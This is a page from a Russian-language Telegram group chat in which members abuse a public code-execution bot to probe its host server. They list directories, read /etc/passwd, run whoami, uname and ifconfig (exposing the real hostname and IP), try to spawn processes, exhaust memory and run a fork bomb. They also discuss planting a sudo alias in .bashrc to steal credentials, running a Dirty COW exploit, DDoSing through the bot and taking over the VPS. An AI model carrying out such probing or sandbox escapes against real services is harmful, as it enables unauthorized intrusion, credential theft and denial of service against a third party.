@habrachat

Страница 3245 из 6731
Yokai
26.10.2016
13:31:06
короче сломал я его

3bl3gamer
26.10.2016
13:31:40
Language: js Source: fs=require('fs'); console.log(fs.readdirSync('/').join('\n')) Result: .cpt_hardlink_dir_a920e4ddc233afddc9fb53d26c392319 aquota.group aquota.user bin boot dev etc fastboot home lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var Stats: Absolute running time: 0.14 sec, cpu time: 0.05 sec, memory peak: 15 Mb, absolute service time: 0,14 sec

Language: js Source: a=-(b=0); console.log(a==b, 1/a==1/b) Result: true false Stats: Absolute running time: 0.14 sec, cpu time: 0.05 sec, memory peak: 15 Mb, absolute service time: 0,14 sec

Google
Admin
26.10.2016
13:38:47
Language: js Source: fs=require('fs'); console.log(fs.readdirSync('/').join('\n')) Result: .cpt_hardlink_dir_a920e4ddc233afddc9fb53d26c392319 aquota.group aquota.user bin boot dev etc fastboot home lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var Stats: Absolute running time: 0.14 sec, cpu time: 0.06 sec, memory peak: 15 Mb, absolute service time: 0,14 sec

Yokai
26.10.2016
13:39:53
Language: js Source: sp=require('child_process').spawn; var it=sp('ls', []); it.stdout.on('data', function(data) { console.log(data); }); Errors: internal/child_process.js:302 throw errnoException(err, 'spawn'); ^ Error: spawn EACCES at exports._errnoException (util.js:1026:11) at ChildProcess.spawn (internal/child_process.js:302:11) at exports.spawn (child_process.js:380:9) at Object.<anonymous> (source_file.js:2:8) at Module._compile (module.js:556:32) at Object.Module._extensions..js (module.js:565:10) at Module.load (module.js:473:32) at tryModuleLoad (module.js:432:12) at Function.Module._load (module.js:424:3) at Module.runMain (module.js:590:10) Stats: Absolute running time: 0.14 sec, cpu time: 0.06 sec, memory peak: 16 Mb, absolute service time: 0,14 sec

Славик
26.10.2016
13:41:08
тебе не нравится синтаксис Js?

Yokai
26.10.2016
13:41:38
мне не нравится неопределенность набора фич в стандарте

Admin
26.10.2016
13:42:09
Language: python Source: import os; os.system("uname -a") Result: Linux lvps92-51-147-212.dedicated.hosteurope.de 3.13.0-042stab113.11 #1 SMP Fri Dec 18 17:32:04 MSK 2015 x86_64 x86_64 x86_64 GNU/Linux Stats: Absolute running time: 0.14 sec, cpu time: 0.02 sec, memory peak: 5 Mb, absolute service time: 0,14 sec

дианон

Levent
26.10.2016
13:42:44
Славик
26.10.2016
13:43:07
ито упоротость
и какой же язык предпочитаешь ты?

Admin
26.10.2016
13:43:13
http://lvps92-51-147-212.dedicated.hosteurope.de/

Levent
26.10.2016
13:43:16
Я не пишу вообще

Yokai
26.10.2016
13:44:01
Language: python Source: import os os.system("wget http://google.com") Errors: --2016-10-26 15:43:31-- http://google.com/ Resolving google.com (google.com)... failed: Name or service not known. wget: unable to resolve host address ‘google.com’ Stats: Absolute running time: 0.14 sec, cpu time: 0.02 sec, memory peak: 5 Mb, absolute service time: 0,14 sec

Google
foxy shell
26.10.2016
13:44:49
а телеграм?

Admin
26.10.2016
13:45:05
http://lvps92-51-147-212.dedicated.hosteurope.de/usercode/

Го сплойт коровы запустим?

foxy shell
26.10.2016
13:46:16
Admin
26.10.2016
13:47:32
Лол. Что сканируешь то?

foxy shell
26.10.2016
13:48:04
его

Хочу узнать что за херня

Yokai
26.10.2016
14:01:41
приму в дар согласие дать мне работу за деньги хD

Admin
26.10.2016
14:15:26
Language: python Source: import os; os.system("whoami"); Result: www-data Stats: Absolute running time: 0.13 sec, cpu time: 0.02 sec, memory peak: 5 Mb, absolute service time: 0,14 sec

Language: python Source: f=open("/etc/passwd"); print(f.read()) Result: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin libuuid:x:100:101::/var/lib/libuuid: syslog:x:101:104::/home/syslog:/bin/false messagebus:x:103:107::/var/run/dbus:/bin/false bind:x:104:111::/var/cache/bind:/bin/false postfix:x:105:113::/var/spool/postfix:/bin/false dovecot:x:106:115:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false dovenull:x:107:116:Dovecot login user,,,:/nonexistent:/bin/false landscape:x:108:117::/var/lib/landscape:/bin/false sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false fetchmail:x:110:65534::/var/lib/fetchmail:/bin/false ren:x:1000:1000::/home/ren: colord:x:111:120:colord colour management daemon,,,:/var/lib/colord:/bin/false Stats: Absolute running time: 0.14 sec, cpu time: 0.01 sec, memory peak: 5 Mb, absolute service time: 0,14 sec

‮¯\_(ツ)_/¯
26.10.2016
14:17:48
Admin
26.10.2016
14:18:09
‮¯\_(ツ)_/¯
26.10.2016
14:18:22
exploit
теперь понимаю

Admin
26.10.2016
14:26:59
Language: python Source: import os; print(os.listdir('/home')) Result: ['ren'] Stats: Absolute running time: 0.14 sec, cpu time: 0.01 sec, memory peak: 5 Mb, absolute service time: 0,14 sec

Admin
26.10.2016
14:29:08
лол

Language: python Source: import os;print(os.listdir("/home/ren")); Result: ['.mono.swp', '.gsutil', '.bashrc', 'scala-2.11.7', '.cache', 'bower_components', '.viminfo', '.selected_editor', '.bash_history', '.octaverc.old-2016-02-13', '.local', 'ycmd', 'StatsRecorder_helper_data.txt', '.npm', 'v8-trunk', '.profile', '.vimrc', '.oracle_jre_usage', '.subversion', '.swipl-dir-history', 'StatsRecorderLin', '.bash_logout', '.lldb', '.bash_completion.d', 'node_modules', 'swift-2.2.1-RELEASE-ubuntu14.04', '.vim', '.config', '.octaverc', '.python_history', 'mastrave'] Stats: Absolute running time: 0.14 sec, cpu time: 0.02 sec, memory peak: 5 Mb, absolute service time: 0,14 sec

лол

го в .bashrc чёт запишем? (если есть права)

Google
Admin
26.10.2016
14:35:45
Туда можн алиас на судо вписать и ждать звездного часа

Rirush
26.10.2016
14:38:11
Language: g++ Source: int main() { int test[10000][10000]; for(int i = 0; i < 10000; i++) { for(int j = 0; j < 10000; j++) { test[i][j] = -1; } } } Warnings: source_file.cpp: In function ‘int main()’: source_file.cpp:2:5: warning: variable ‘test’ set but not used [-Wunused-but-set-variable] int test[10000][10000]; ^ Stats: Compilation time: 0.12 sec, absolute running time: 0.14 sec, cpu time: 0 sec, memory peak: 3 Mb, absolute service time: 0,34 sec

Так.

3 мб.

Это не дело

Admin
26.10.2016
14:40:56
Го ломать бота

Сервер точнее где он хостится

.bashrc не хочет давать сволочь)

Файлы в /tmp можно создавать, но ничего туда вроде не пишется

Rirush
26.10.2016
14:44:11
Блен

Мы как то его в outofmemory загнали

Но как я не помню

Admin
26.10.2016
14:44:45
Хм. А чё

Идея

3bl3gamer
26.10.2016
14:44:48
ой @rextester_bot python import os print(os.system("python "+__file__))

Rirush
26.10.2016
14:44:53
Массив не канает

Надо что-то тяжелое

И быстрое

Admin
26.10.2016
14:45:10
За 10 секунд форкнуть дохуя процессов python'a или ещё чего то тяжелее

Rirush
26.10.2016
14:45:13
На 1,5 гб озу

Google
3bl3gamer
26.10.2016
14:45:26
он завис или как?

Admin
26.10.2016
14:46:19
Нужно посмотреть что там поставлено

3bl3gamer
26.10.2016
14:46:23
упс. я надеюсь, у всех удалилась эта простыня?

Rirush
26.10.2016
14:46:52
Language: node Source: process.exit(-1) Stats: Absolute running time: 0.13 sec, cpu time: 0.05 sec, memory peak: 15 Mb, absolute service time: 0,14 sec

15 Мб!

Admin
26.10.2016
14:47:09
Language: python Source: import os; print(os.listdir("/bin")) Result: ['ypdomainname', 'less', 'chgrp', 'sed', 'uncompress', 'dbus-uuidgen', 'zdiff', 'mount', 'bzcmp', 'bzdiff', 'dd', 'loginctl', 'vdir', 'touch', 'su', 'red', 'plymouth', 'dbus-cleanup-sockets', 'bzegrep', 'bzgrep', 'zmore', 'zforce', 'more', 'gzexe', 'uname', 'getfacl', 'readlink', 'tar', 'bash', 'zless', 'chmod', 'mknod', 'lsmod', 'lessfile', 'cp', 'kill', 'nisdomainname', 'dmesg', 'mountpoint', 'mkdir', 'setfacl', 'netstat', 'bzip2recover', 'lsblk', 'true', 'fuser', 'sh.distrib', 'bzip2', 'lessecho', 'znew', 'rbash', 'which', 'login', 'dbus-daemon', 'domainname', 'rmdir', 'rm', 'dnsdomainname', 'zcmp', 'tcsh', 'bzcat', 'dir', 'zegrep', 'gunzip', 'ps', 'pwd', 'sleep', 'chown', 'plymouth-upstart-bridge', 'umount', 'df', 'fgrep', 'date', 'kmod', 'bzmore', 'ip', 'running-in-container', 'ping6', 'egrep', 'bzless', 'zgrep', 'hostname', 'cpio', 'udevadm', 'lesskey', 'zcat', 'bunzip2', 'ed', 'tailf', 'stty', 'echo', 'mt', 'mktemp', 'mt-gnu', 'gzip', 'csh', 'zfgrep', 'pidof', 'lesspipe', 'ping', 'bzexe', 'sh', 'tempfile', 'findmnt', 'ls', 'run-parts', 'ln', 'sync', 'mv', 'dash', 'false', 'grep', 'ss', 'bzfgrep', 'chacl', 'cat'] Stats: Absolute running time: 0.14 sec, cpu time: 0.02 sec, memory peak: 5 Mb, absolute service time: 0,14 sec

3bl3gamer
26.10.2016
14:47:11
хром-с

Admin
26.10.2016
14:47:28
import os; print(os.listdir("/usr/sbin/"))

Language: python3 Source: import os; print(os.listdir("/usr/sbin")) Result: ['update-dictcommon-aspell', 'rpcinfo', 'rndc', 'rndc-confgen', 'rmt-tar', 'ldattach', 'dpkg-reconfigure', 'mono-server4-admin', 'cytune', 'split-logfile', 'pwunconv', 'testsaslauthd', 'named-checkconf', 'tcptraceroute', 'update-info-dir', 'update-fonts-alias', 'paperconfig', 'sendmail', 'postalias', 'postconf', 'smtp-source', 'update-mime', 'update-cracklib', 'apache2ctl', 'update-xmlcatalog', 'update-locale', 'vigr', 'postsuper', 'dnssec-keygen', 'cron', 'warnquota', 'remove-default-wordlist', 'apache2', 'icupkg', 'smtp-sink', 'a2query', 'update-default-aspell', 'aspell-autobuildhash', 'locale-gen', 'update-passwd', 'arp', 'grpconv', 'php5enmod', 'nologin', 'rpc.rquotad', 'named-journalprint', 'dhcp6c', 'nfnl_osf', 'update-catalog', 'filefrag', 'update-icon-caches', 'dnssec-checkds', 'genccode', 'named', 'arpd', 'edquota', 'tcpdump', 'sasldblistusers2', 'make-ssl-cert', 'update-default-ispell', 'update-fonts-scale', 'postkick', 'adduser', 'grpunconv', 'cracklib-format', 'newusers', 'cracklib-packer', 'php5dismod', 'cppw', 'postcat', 'dnssec-verify', 'cpgr', 'ispell-autobuildhash', 'qmqp-sink', 'gennorm2', 'setquota', 'update-gsfontmap', 'sasl-sample-server', 'sshd', 'upgrade-windowmaker-defaults', 'dnssec-signzone', 'saslpluginviewer', 'dnssec-importkey', 'sensible-mda', 'a2dissite', 'a2disconf', 'usermod', 'validlocale', 'update-inetd', 'php5query', 'postmap', 'userdel', 'add-shell', 'chgpasswd', 'named-checkzone', 'dnssec-coverage', 'postfix-add-filter', 'rtcwake', 'update-binfmts', 'a2ensite', 'install-sgmlcatalog', 'postlock', 'rsyslogd', 'update-java-alternatives', 'chpasswd', 'pam-auth-update', 'dnssec-revoke', 'pwck', 'ppa-purge', 'update-dictcommon-hunspell', 'quot', 'addgroup', 'select-default-wordlist', 'postlog', 'mkinitramfs', 'check_forensic', 'zic', 'groupdel', 'convertquota', 'saslauthd', 'traceroute', 'gencmn', 'chroot', 'postdrop', 'xqmstats', 'qshape', 'postfix', 'uuidd', 'grpck', 'delgroup', 'mysqld', 'update-rc.d', 'xinetd', 'tzconfig', 'dpkg-preconfigure', 'pwconv', 'xconv.pl', 'iconvconfig', 'fdformat', 'apachectl', 'readprofile', 'a2enconf', 'update-ca-certificates', 'dnssec-keyfromlabel', 'update-initramfs', 'posttls-finger', 'arpaname', 'update-fonts-dir', 'ip6tables-apply', 'genrandom', 'tarcat', 'pam_timestamp_check', 'iptables-apply', 'itox', 'sasldbconverter2', 'groupadd', 'create-cracklib-dict', 'e4defrag', 'rmt', 'cracklib-unpacker', 'postmulti', 'remove-shell', 'isc-hmac-fixup', 'httxt2dbm', 'pam_getenv', 'tcptraceroute.db', 'vipw', 'nsec3hash', 'useradd', 'select-default-ispell', 'service', 'cracklib-check', 'logrotate', 'quota_nld', 'named-compilezone', 'update-python-modules', 'update-icon-caches.gtk2', 'invoke-rc.d', 'memtester', 'saslpasswd2', 'dnssec-dsfromkey', 'rmail', 'visudo', 'ddns-confgen', 'dhcp6ctl', 'a2enmod', 'mklost+found', 'qmqp-source', 'accessdb', 'dnssec-settime', 'quotastats', 'a2dismod', 'repquota', 'mono-server4-update', 'deluser', 'postqueue', 'gensprep', 'tunelp', 'update-default-wordlist', 'e2freefrag', 'postfix-add-policy', 'libgvc6-config-update', 'remove-default-ispell', 'groupmod'] Stats: Absolute running time: 0.14 sec, cpu time: 0.02 sec, memory peak: 5 Mb, absolute service time: 0,14 sec

3bl3gamer
26.10.2016
14:49:35
Language: python2 Source: True=False; print(True) Result: False Stats: Absolute running time: 0.13 sec, cpu time: 0.01 sec, memory peak: 4 Mb, absolute service time: 0,14 sec

Rirush
26.10.2016
14:49:45
Нвшель

Language: c++ Source: int main(){ int *bug; for(int i=0 ; i<50000000;++i){ bug = new int[10]; } bug[1]=bug[2]; } Errors: terminate called after throwing an instance of 'std::bad_alloc' what(): std::bad_alloc Abort signal from abort(3) (SIGABRT) Stats: Compilation time: 0.12 sec, absolute running time: 1.64 sec, cpu time: 1.55 sec, memory peak: 1418 Mb, absolute service time: 1,77 sec

Admin
26.10.2016
14:50:19
Лол

Ну не над

Го лучше покрякаем его

3bl3gamer
26.10.2016
14:50:53
Language: ruby Source: p 'кря' Errors: source_file.rb:1: invalid multibyte char (US-ASCII) source_file.rb:1: invalid multibyte char (US-ASCII) Stats: Absolute running time: 0.14 sec, cpu time: 0.01 sec, memory peak: 4 Mb, absolute service time: 0,14 sec

не крякает

Rirush
26.10.2016
14:51:16
'encoding utf-8'

3bl3gamer
26.10.2016
14:51:52
Language: perl Source: print 'кря' Result: кря Stats: Absolute running time: 0.14 sec, cpu time: 0 sec, memory peak: 3 Mb, absolute service time: 0,14 sec

Admin
26.10.2016
14:52:04
Го лучше дудос?

Google
Admin
26.10.2016
14:52:16
ботом

лол

Rirush
26.10.2016
14:52:18


Че

Че

Че

Алло

А

Тг просто лагает

3bl3gamer
26.10.2016
14:53:41
Language: perl Source: print `ifconfig` Result: lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:7796 errors:0 dropped:0 overruns:0 frame:0 TX packets:7796 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:36899505 (36.8 MB) TX bytes:36899505 (36.8 MB) venet0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:127.0.0.1 P-t-P:127.0.0.1 Bcast:0.0.0.0 Mask:255.255.255.255 inet6 addr: ::2/128 Scope:Compat inet6 addr: 2a01:488:66:1000:5c33:93d4:0:1/128 Scope:Global UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1 RX packets:197932 errors:0 dropped:0 overruns:0 frame:0 TX packets:232108 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:66251051 (66.2 MB) TX bytes:96237141 (96.2 MB) venet0:0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:92.51.147.212 P-t-P:92.51.147.212 Bcast:92.51.147.212 Mask:255.255.255.255 UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1 Stats: Absolute running time: 0.14 sec, cpu time: 0 sec, memory peak: 3 Mb, absolute service time: 0,14 sec

Admin
26.10.2016
14:54:11
Виртуалка видимо

ну ни чё

Тоже згодится

3bl3gamer
26.10.2016
14:54:43
типа, кому нужен халявный немецкий VPS?

Admin
26.10.2016
14:55:13
Халявный?

Rirush
26.10.2016
14:55:32
Language: perl Source: print `:(){ :|:& }:` Errors: sh: -c: line 1: syntax error: unexpected end of file Stats: Absolute running time: 0.14 sec, cpu time: 0 sec, memory peak: 3 Mb, absolute service time: 0,14 sec

:(

Admin
26.10.2016
14:55:44
а нахуй принт?

Страница 3245 из 6731